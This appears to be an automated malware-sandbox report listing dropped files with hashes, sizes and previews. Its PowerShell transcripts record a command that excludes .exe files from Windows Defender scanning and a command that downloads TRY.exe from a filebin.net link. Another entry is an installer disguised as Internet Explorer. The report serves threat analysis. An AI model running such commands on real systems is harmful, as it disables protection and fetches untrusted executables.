SHA1:	754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
SHA-256:	625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
SHA-512:	0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
Malicious:	false
Preview:	..p.r.a.t.e.s.h.....

C:\Users\user\Desktop\~$543_0008858249_FWDOUTSTANDING_20200604.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.835349359004837
Encrypted:	false
SSDEEP:	3:Rl/Zdw9+ll1lqKxzJ3hDL/lElNvWlL5rHon:RtZWolgqzJ3YNG5rHon
MD5:	E9BD32C8D882AC39122ED2C3EF0CD71B
SHA1:	E8F9CED6EF082FDFB2083C5FB01AD361EB6E6067
SHA-256:	A6664920BAB2EA3A69D04F4EC24C36D76EC8A775C945C51BB51FF7CA3385B94C
SHA-512:	6D6FAA8E7C40577E6E62006EEC532D1ED3A766DE89F6153F6B5F32EA320C62EABEDC5F6EA51DA87ACB69E6EBB53C934B7047EDAB9039D5049CA180D4A4DC55CC
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h...}......o...5..........T.......6C.......o...6......h.......A...@..j.....o...7....sl@_......

C:\Users\user\Documents\20220420\PowerShell_transcript.377142.dqLccvHK.20220420092831.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5177
Entropy (8bit):	5.328944606047066
Encrypted:	false
SSDEEP:	96:BZG/KNHqDo1ZXZU/KNHqDo1ZtnVFrZh/KNHqDo1ZDCbbXZU:O
MD5:	DC801B1613BCDCBFEA0C809703D9F4F7
SHA1:	8BD13ED05F899551772DC902FA2CA62965F36F46
SHA-256:	E26BA51B550F5048C5CE5AA429EFC4F33D2990DAAF2E4DBD1B6EA6CF61D6F7E6
SHA-512:	50E216F32DF5110A42E155BDF871F2352E8964B1B6AC15A2D3619C97BCB866834E8AAB805A7447B45A7474C61AE0E0ACE8EFB74231E98A83AAAD5FE6965BA08A
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220420092832..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -command Set-MpPreference -ExclusionExtension .exe..Process ID: 6700..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220420092832..******************..PS>Set-MpPreference -ExclusionExtension .exe..********************..Windows PowerShell transcript start..Start time: 20220420093158..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell

C:\Users\user\Documents\20220420\PowerShell_transcript.377142.szj6FUBY.20220420092838.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1025
Entropy (8bit):	5.176622431294181
Encrypted:	false
SSDEEP:	24:BxSA7DvBBKx2DOXwxnWvyHjeTKKjX4CIym1ZJXfxHnxSAZm:BZ3v/KoOgxWaqDYB1ZRxHZZm
MD5:	D497C4AEE1B8E28AC98F811E8D075F41
SHA1:	01A59EEB4ADF4104FDAD6152391B620B43B05E5C
SHA-256:	12F84D5372F192875BE530B83F3D301A4FC35FC2C08607D291582598ADD022CF
SHA-512:	F1FE48E3EB2091FAB2FC930B03EDFBA5ED50FFC43E6FDA004A45A7DF0F235036A4F78C58B3DF498BCC97E8CEF6AC9391319F8F4E3C4C22FB49E22B3BF4C3A9BE
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220420092840..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -command Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe..Process ID: 6884..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220420092840..******************..PS>Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe..******************..Command start time: 20220420093148..******************..PS>$global:?..True..********************..Windows PowerShell transcript end..End time: 20220420093148.

C:\Windows\Installer\54841d.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 11.0.18362.1, Subject: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {4982A61C-946D-4168-809C-13FF99C4C351}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
Category:	dropped
Size (bytes):	491520
Entropy (8bit):	6.791342319398629
Encrypted:	false
SSDEEP:	6144:cytOIiRQYpgjpjew5LLyGx1qo8yppyN90PEGUEpKy/90QEc:cytMRQ+gjpjegLyo8Cy90V4w90i
MD5:	260BEC1B34CE96E5ED6C42D51E7146FB
SHA1:	57EC75201B4957B5C9F4266264E4A3C953255801
SHA-256:	29C51CD98EAE68D4E63941C8CE41EEDAC2FB18500CD00388EE8D29619CA3F160
SHA-512:	A8AED798334A8BD35802E3166823D434B292036D5F0BBBE9E2F3587A660F856FF0CE918C8665BD88FCF443BFFA816FDC8EF0D4B13DC5A00CC82D8DC77F50919C
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI1064.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	212992
Entropy (8bit):	6.513444216841171
Encrypted:	false
SSDEEP:	3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
MD5:	4CAAA03E0B59CA60A3D34674B732B702
SHA1:	EE80C8F4684055AC8960B9720FB108BE07E1D10C
SHA-256:	D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
SHA-512:	25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI847A.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	212992
Entropy (8bit):	6.513444216841171
Encrypted:	false
SSDEEP:	3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
MD5:	4CAAA03E0B59CA60A3D34674B732B702
SHA1:	EE80C8F4684055AC8960B9720FB108BE07E1D10C
SHA-256:	D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
SHA-512:	25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI94E.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 11.0.18362.1, Subject: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {4982A61C-946D-4168-809C-13FF99C4C351}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
Category:	dropped
Size (bytes):	491520
Entropy (8bit):	6.791342319398629
Encrypted:	false
SSDEEP:	6144:cytOIiRQYpgjpjew5LLyGx1qo8yppyN90PEGUEpKy/90QEc:cytMRQ+gjpjegLyo8Cy90V4w90i
MD5:	260BEC1B34CE96E5ED6C42D51E7146FB
SHA1:	57EC75201B4957B5C9F4266264E4A3C953255801
SHA-256:	29C51CD98EAE68D4E63941C8CE41EEDAC2FB18500CD00388EE8D29619CA3F160
SHA-512:	A8AED798334A8BD35802E3166823D434B292036D5F0BBBE9E2F3587A660F856FF0CE918C8665BD88FCF443BFFA816FDC8EF0D4B13DC5A00CC82D8DC77F50919C
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIFECC.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	87537
Entropy (8bit):	7.440273593114794
Encrypted:	false
SSDEEP:	1536:zWdPzE3ROovcK4zqhNCcVqUFdjtzty9jeal9G6Mb1tBaa9NEyzg:zWp1icKAArDZz4N9Ghbk8NEkg
MD5:	E5E0D0D53AD35323FCC64054D827D7F6
SHA1:	9FCF1D718802EFC9C8DD57D3EE0162D80940ADF1
SHA-256:	D619B735CA395FCD72E6999289CAEE11B26C724657C195F2ED217441A7419B78
SHA-512:	34BA5E7E5358D95B09ABC36B51243599737D49DC282FB5046CB3779909E109866535B87EE9D20064496D039CEEB53F0CD722EBED68F75D5775F02B5001C597A6
Malicious:	false
Preview:	...@IXOS.@.....@.K.T.@.....@.....@.....@.....@.....@......&.{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}P.Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..TRY.msi.@.....@.G...@.....@......ProductIcon..&.{4982A61C-946D-4168-809C-13FF99C4C351}.....@.....@.....@.....@.......@.....@.....@.......@....P.Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}7.02:\SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\LogonUser.@.......@.....@.....@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]...@.....@.....@.3..$..@....*.SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\...@....%...LogonUser..user%...USERNAME..pratesh%...Date..4/20/2022%...Time..9:29:17%...WRAPPED_ARGUMENTS....RegisterProduc

C:\Windows\Installer\MSIFECD.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	212992
Entropy (8bit):	6.513444216841171
Encrypted:	false
SSDEEP:	3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
MD5:	4CAAA03E0B59CA60A3D34674B732B702
SHA1:	EE80C8F4684055AC8960B9720FB108BE07E1D10C
SHA-256:	D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
SHA-512:	25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5789603197168818
Encrypted:	false
SSDEEP:	48:Qx8PhcuRc06WXJqFT5RbPiKqYaddSr9Zf7uSiYWPiKeTddSsPiKVrRvWo:QMhc1hFTDqtytWZK33v
MD5:	9C872FF69A3DDE4A90A88A25B801B392
SHA1:	969D2F867882C7489ED0E61CB684C41DF59B2ABC
SHA-256:	A3EBB9A10BAA0FE9FA0E82690A00F2940887FE0C72D553430CDE5925AAFEBE9A
SHA-512:	9145CB84BFB5C79440648E0FBC127A062CF75962E8A3604EE66372355391A2E34FD2AEE2E11D18D9569A5CFF6FF3D258106D85C279D7C06134CA392578D5C33E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}\ProductIcon

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows icon resource - 13 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
Category:	dropped
Size (bytes):	85704
Entropy (8bit):	7.438168375702977
Encrypted:	false
SSDEEP:	1536:uWdPzE3ROovcK4zqhNCcVqUFdjtzty9jeal9G6Mb1tBaa9NEyzS:uWp1icKAArDZz4N9Ghbk8NEkS
MD5:	19D6BA1A1AA441E6C3D0C7755F03999C
SHA1:	B0C285A593B51C0E0A109B69EC3198CDCE37E4D7
SHA-256:	157B6BA2431AA2B592B718F2B2EEEF697BFD545B425ED7B6AA3FA7E1EC0DF49C
SHA-512:	C4B201B12EB9F5FF90C2C8916661FC38247F8DBB2DD55FC6E0DE2311F98B631FFA38499F8808BBF4AA59801E81EC1EF8B1E1A127B0DC6A6FC94B0E1FF9CC9CBC
Malicious:	false
Preview:	......00......h....... ..........>...............&...........(.......00..........6... ...........................$..........h...N+........ ......0..00.... ..%...... .... .....00........ ......@........ .h...`J..(...0...`...............................................................................................................................................................w......................w.x....................ww..p.................wxvx.....................xww...p................xxg.......................w....p..........x......xxx...p.........x........x.............w.........x....p......'.ww.............p......G..xx.......x..............ww.....w......p.......x.......w.x.....p......'xx.....w.w......p......Gwww....www..............w.......xw......p.......xx.....w........p.......x..h...www......p.......xww.....xx..............{.......xx.x....p......g..xx............p........xx...........x.p.......................p.........x.............p.....................x.p..............

C:\Windows\Logs\DPX\setupact.log

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.326711673451014
Encrypted:	false
SSDEEP:	24:aKm2r6Kb2U76Kb2r6Kb2U76Kb2zpY12U6m2Km2r6Kb2U76Kb2zpY12U6r:Us6KbV6Kbs6KbV6Kb4QDws6KbV6Kb4Qo
MD5:	A9AB228D86CEC030452D41368005ABB3
SHA1:	056E5701B8544DAB4F117A840D94D830A96070DE
SHA-256:	97767413946FE4FEFE44E426835174A845B976E746B6F0A8A82A1A3D2B8FF158
SHA-512:	19E714156CFD60E85D45ABED87FB8598497453144723A16AE92F4C7E4763F402C50FD0FDC87D15AFD33115D1CE5EF37A4B487D8F3CFA66F46E01DD47EA8745BF
Malicious:	false
Preview:	.2022-04-20 09:28:26, Info DPX Started DPX phase: Resume and Download Job..2022-04-20 09:28:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:28:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:28:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:28:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:28:26, Info DPX CJob::Resume completed with status: 0x0..2022-04-20 09:28:26, Info DPX Ended DPX phase: Resume and Download Job..2022-04-20 09:28:26, Info DPX Started DPX phase: Resume and Download Job..2022-04-20 09:28:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:28:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:28:26, Info

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	81287
Entropy (8bit):	5.2988178167254345
Encrypted:	false
SSDEEP:	192:XL/vcrZZDZo/ZrXczaIcO/gcMH5elWSLy:XDvsDZGrkaIcO/Y5Xuy
MD5:	79EEC6E3B17B3BFE21369079566D5CDA
SHA1:	DB19E49C5F9FAC427774A052C3B178FFA3F01694
SHA-256:	78E8ED021211040073E7E1E7228CD99C196C60391845A7145F9FFF84E5EBD8DC
SHA-512:	97A10D304AF611B8D0C652974E0CAE3D7E2516F16A76B858678D2B9F5D3E1589F7CB37D7F6B9A5B08E10150EC41F2719BDC00C31033D06758BFF78F5EE33C473
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:38:04.497 [4552]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.513 [4552]: ngen returning 0x00000000..07/23/2020 10:38:04.559 [4480]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.559 [4480]: ngen returning 0x00000000..07/23/2020 10:38:04.622 [4256]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.622 [

C:\Windows\Temp\~DF20598E5DAB6B2B3C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.14837175983130746
Encrypted:	false
SSDEEP:	48:6o6v4rfddSsPiK3ddSr9Zf7uSiYWPiKelYBPiKB:Wvi3/ytWZaW
MD5:	14FA135BC1CB8FA8637870E7866FC0C5
SHA1:	6C3AE1DEF32D0C8B4C63A4D4715BB79D1CBB15E9
SHA-256:	1CE65FE06E55BBC1591C9F10C14F66B9E76CD6ABBBEEFAB1961F116CE63EC67A
SHA-512:	889A17E068E53EC200C967AC44974FB49610D05C6CC84D89A00481156CA8E1E0191D22325A6CB2BDBCB12205223207110A132565B13865DA5202BE6EC61863E9
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF20725BC976A732BA.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2620432767380305
Encrypted:	false
SSDEEP:	48:glBUu+JveFXJbT5vbPiKqYaddSr9Zf7uSiYWPiKeTddSsPiKVrRvWo:gfUQDTFqtytWZK33v
MD5:	A4E769BF8E0943970C3077274F845704
SHA1:	F002BB4752332FAC77DDA502224268F59ED53466
SHA-256:	66E5634D68F8670FBF359EC958DE51C18AC3C73DDB3675E8245159B023CCD211
SHA-512:	A3A665E34607E823CD2B1DBCCE7F93EDEB9082912D57196CCD77E070419EB544C5465C823F81035A1FC51855D234E06FF86D8C69EE6888E0F02CE39A828A76D3
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3B9CC377E0CCEDD0.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5789603197168818
Encrypted:	false
SSDEEP:	48:Qx8PhcuRc06WXJqFT5RbPiKqYaddSr9Zf7uSiYWPiKeTddSsPiKVrRvWo:QMhc1hFTDqtytWZK33v
MD5:	9C872FF69A3DDE4A90A88A25B801B392
SHA1:	969D2F867882C7489ED0E61CB684C41DF59B2ABC
SHA-256:	A3EBB9A10BAA0FE9FA0E82690A00F2940887FE0C72D553430CDE5925AAFEBE9A
SHA-512:	9145CB84BFB5C79440648E0FBC127A062CF75962E8A3604EE66372355391A2E34FD2AEE2E11D18D9569A5CFF6FF3D258106D85C279D7C06134CA392578D5C33E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF81A71F8F35F618E7.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9ADBD6665E8B4CBD.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9BB32A0C57F82C0E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFAB5AE087B19AB60D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2620432767380305
Encrypted:	false
SSDEEP:	48:glBUu+JveFXJbT5vbPiKqYaddSr9Zf7uSiYWPiKeTddSsPiKVrRvWo:gfUQDTFqtytWZK33v
MD5:	A4E769BF8E0943970C3077274F845704
SHA1:	F002BB4752332FAC77DDA502224268F59ED53466
SHA-256:	66E5634D68F8670FBF359EC958DE51C18AC3C73DDB3675E8245159B023CCD211
SHA-512:	A3A665E34607E823CD2B1DBCCE7F93EDEB9082912D57196CCD77E070419EB544C5465C823F81035A1FC51855D234E06FF86D8C69EE6888E0F02CE39A828A76D3
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFAC439D90DB59E05A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2620432767380305
Encrypted:	false
SSDEEP:	48:glBUu+JveFXJbT5vbPiKqYaddSr9Zf7uSiYWPiKeTddSsPiKVrRvWo:gfUQDTFqtytWZK33v
MD5:	A4E769BF8E0943970C3077274F845704
SHA1:	F002BB4752332FAC77DDA502224268F59ED53466
SHA-256:	66E5634D68F8670FBF359EC958DE51C18AC3C73DDB3675E8245159B023CCD211
SHA-512:	A3A665E34607E823CD2B1DBCCE7F93EDEB9082912D57196CCD77E070419EB544C5465C823F81035A1FC51855D234E06FF86D8C69EE6888E0F02CE39A828A76D3
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFDFFC1564218D87CA.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE29D32E56A221400.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFFFE9197EB1FCF16E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5789603197168818
Encrypted:	false
SSDEEP:	48:Qx8PhcuRc06WXJqFT5RbPiKqYaddSr9Zf7uSiYWPiKeTddSsPiKVrRvWo:QMhc1hFTDqtytWZK33v
MD5:	9C872FF69A3DDE4A90A88A25B801B392
SHA1:	969D2F867882C7489ED0E61CB684C41DF59B2ABC
SHA-256:	A3EBB9A10BAA0FE9FA0E82690A00F2940887FE0C72D553430CDE5925AAFEBE9A
SHA-512:	9145CB84BFB5C79440648E0FBC127A062CF75962E8A3604EE66372355391A2E34FD2AEE2E11D18D9569A5CFF6FF3D258106D85C279D7C06134CA392578D5C33E
Malicious:	false
